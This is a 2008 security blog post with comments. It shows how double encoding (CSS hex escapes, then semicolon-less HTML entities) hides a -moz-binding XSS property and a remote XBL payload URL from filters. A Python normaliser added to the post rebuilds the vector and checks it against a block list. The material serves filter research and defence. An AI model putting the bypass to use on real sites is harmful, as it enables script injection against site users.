CSS supports hex escapes inside styles, and HTML supports character entities, but did you know you could combine the two? I didn’t. To construct an attack similar to the one displayed below you first need to convert your CSS property name to hex escapes, so -moz-binding becomes: \2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67. Notice there is no “x” prefix and no leading zeros, unlike the HTML entities or JavaScript \u escapes you would normally see. The link contains a Hackvertor URL to help you with the conversion.
You can do the same conversion on the value of the property, so the URL of the moz-binding payload, //businessinfo.co.uk/labs/xbl/xbl.xml#xss, becomes: \2f\2f\62\75\73\69\6e\65\73\73\69\6e\66\6f\2e\63\6f\2e\75\6b\2f\6c\61\62\73\2f\78\62\6c\2f\78\62\6c\2e\78\6d\6c\23\78\73\73
I hope you’re following so far; we can now take the escaped property string and encode it further, crazy eh? Any part of the property can now be encoded with HTML entities. I went for the backslash and malformed (semicolon-less) entities, but you can experiment with different combinations. The property “\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67” now becomes: &#x5c2d&#x5c6d&#x5c6f&#x5c7a&#x5c2d&#x5c62&#x5c69&#x5c6e&#x5c64&#x5c69&#x5c6e&#x5c67 (each backslash replaced by &#x5c with no terminating semicolon; a browser that reads every hex digit as part of the entity renders that string as the CJK characters 尭屭屯屺尭屢屩屮層屩屮屧).
Here is the final vector, with a link to Hackvertor for testing:

The final vector
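As an added example (my own code, not from the post, Hackvertor or any Mozilla source), the following Python normaliser reproduces the two encoding layers described above and then decodes them the way a defensive CSS filter would have to. It decodes the entity layer twice: once with the standard HTML rules, where every hex digit belongs to the reference (which yields the CJK string that Firefox 3's error console reports), and once under an assumed "lenient" model of the Firefox 2 behaviour the author describes, where a reference without a semicolon only contributes its first two hex digits. The function names, the two-digit cutoff and the `DANGEROUS_PROPERTIES` list are my assumptions for illustration.

```python
import html
import re

# Added example (not from the original post). It walks through the two encoding layers
# the post describes and shows what a filter has to undo to see the real property name.

# CSS escape: backslash + 1..6 hex digits (+ one optional whitespace), or backslash + any char.
CSS_ESCAPE_RE = re.compile(r'\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\(.)', re.DOTALL)
# Hex numeric character reference; the semicolon is optional, as in the post's malformed entities.
HEX_REF_RE = re.compile(r'&#[xX]([0-9a-fA-F]+)(;?)')

# Assumed block list: property names a CSS filter should never let through.
DANGEROUS_PROPERTIES = {'-moz-binding', 'behavior', 'expression'}


def _safe_chr(cp):
    """Map NUL, surrogates and out-of-range code points to U+FFFD, as a CSS tokenizer does."""
    if cp == 0 or cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
        return '\ufffd'
    return chr(cp)


def css_hex_escape(text):
    """Layer 1 from the post: write every character as a \\hh CSS escape (no 'x', no padding)."""
    return ''.join('\\%x' % ord(ch) for ch in text)


def css_unescape(text):
    """Undo CSS escapes the way a CSS tokenizer does."""
    def repl(m):
        if m.group(1) is not None:
            return _safe_chr(int(m.group(1), 16))
        return m.group(2)
    return CSS_ESCAPE_RE.sub(repl, text)


def entity_encode_backslashes(text):
    """Layer 2 from the post: replace each backslash with the semicolon-less reference &#x5c."""
    return text.replace('\\', '&#x5c')


def decode_hex_refs_lenient(text, max_digits=2):
    """Assumed model (not checked against Firefox 2 source) of the behaviour the post's author
    describes: a hex reference with no terminating semicolon only "takes into account the first
    few characters", so &#x5c2d is read as U+005C followed by the literal text "2d"."""
    def repl(m):
        digits, semicolon = m.group(1), m.group(2)
        if semicolon:
            return _safe_chr(int(digits, 16))
        return _safe_chr(int(digits[:max_digits], 16)) + digits[max_digits:]
    return HEX_REF_RE.sub(repl, text)


def normalise_css(text):
    """Decode both layers under each entity-decoding model a filter has to worry about.
    'conformant' follows the HTML rules (all hex digits belong to the reference);
    'lenient' follows the assumed Firefox 2 model above."""
    return {
        'conformant': css_unescape(html.unescape(text)),
        'lenient': css_unescape(decode_hex_refs_lenient(text)),
    }


def flags_dangerous_property(text):
    """True if any decoding model turns the text into a blocked property name."""
    return any(v.strip().lower() in DANGEROUS_PROPERTIES
               for v in normalise_css(text).values())


def build_post_vector(prop='-moz-binding'):
    """Constructed reproduction of the post's doubly-encoded property name."""
    return entity_encode_backslashes(css_hex_escape(prop))


if __name__ == '__main__':
    vector = build_post_vector()
    print('encoded    :', vector)
    for model, decoded in normalise_css(vector).items():
        print('%-11s:' % model, decoded)
    print('blocked    :', flags_dangerous_property(vector))
```

The point for a filter author is that a single decoding pass is not enough: a blocklist matched against the raw text, or against only the conformant decode, never sees the string -moz-binding, while the lenient decode recovers it exactly. Running the normaliser over both models and blocking if either matches closes that gap.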
Comments (6)

Interesting, I quickly checked the method in Firefox 3 and it doesn’t seem to work. I haven’t checked it in Firefox 2 though.
Posted 04 Feb 2008 at 2:55 pm

Yep, only tested in Firefox 2, although other tricks may be possible with FF3. I might have a go at that some other time.
Posted 04 Feb 2008 at 3:21 pm

Another thing I forgot to mention is that NoScript silently disables moz-binding, so you have to disable NoScript to test the vector.
Posted 04 Feb 2008 at 3:24 pm

Error console in FF3:
Warning: Unknown property ‘尭屭屯屺尭屢屩屮層屩屮屧’. Declaration dropped.
Though I think FF3 enforces SOP on -moz-binding now anyway, right?
Posted 05 Feb 2008 at 4:07 am

@riahmatic
Yep, that’s the expected behavior, but FF2 seems to read the entities first and decode them, but for some reason only takes into account the first few characters (maybe because it’s in a style).
I’ve not looked at FF3 much yet, but I’m sure to have plenty of fun when I do.
If FF3 does enforce SOP on moz-binding then that’s a good thing, but I’ve not seen it mentioned anywhere.
Posted 05 Feb 2008 at 9:26 am

Awesome!
Posted 06 Feb 2008 at 1:57 am